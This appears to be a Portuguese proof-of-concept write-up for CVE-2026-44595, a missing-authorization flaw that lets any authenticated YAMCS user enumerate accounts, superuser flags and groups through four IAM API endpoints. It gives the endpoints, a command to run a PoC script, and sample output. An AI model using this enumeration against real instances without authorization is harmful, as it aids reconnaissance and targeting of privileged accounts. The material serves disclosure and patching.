
# CVE-2026-44595 YAMCS Enumeração Não Autorizada de Usuários via API IAM
Os endpoints da API IAM (listUsers, getUser, listGroups, getGroup) no yamcs-core não aplicam a verificação necessária de SystemPrivilege.ControlAccess. Qualquer usuário autenticado — mesmo sem privilégios — pode enumerar todas as contas de usuário, o status de superusuário e as associações a grupos.
| Campo | Valor |
|---|---|
| CVE | CVE-2026-44595 |
| Gravidade | MÉDIA (CVSS 4.3) |
| CWE | CWE-862: Autorização Ausente |
| Afetado | yamcs-core < 5.12.7 |
| Corrigido em | yamcs-core 5.12.7 |
| Aviso | GHSA-p2rj-mrmc-9w29 |
Os seguintes endpoints estão sem a verificação de autorização SystemPrivilege.ControlAccess:
GET /api/iam/users — lista todos os usuáriosGET /api/iam/users/{name} — obtém detalhes do usuárioGET /api/iam/groups — lista todos os gruposGET /api/iam/groups/{name} — obtém detalhes do grupoUm usuário com privilégios baixos pode chamar esses endpoints e obter todos os nomes de usuário, flags de superusuário, associações a grupos e informações do provedor de identidade.
pip install requests
python3 poc.py http://localhost:8090 testuser testpassword
Saída esperada em uma instância vulnerável:
[2] Listing ALL users (IAM endpoint)...
Status: HTTP 200
[!!!] VULNERABLE: 3 users enumerated
-> admin [SUPERUSER]
-> operator [regular]
-> testuser [regular]
Um atacante com qualquer conta válida pode mapear toda a estrutura de usuários da instância YAMCS — identificando contas de superusuário para ataques direcionados, enumerando contas de operador e compreendendo os controles de acesso baseados em grupos.
Atualize para yamcs-core >= 5.12.7.
| Data | Evento |
|---|---|
| 2026-05 | Vulnerabilidade reportada |
| 2026-05-27 | Correção lançada no yamcs-core 5.12.7 |
| 2026-05-27 | Aviso público publicado |
Daniel Miranda Barcelona (Excal1bur)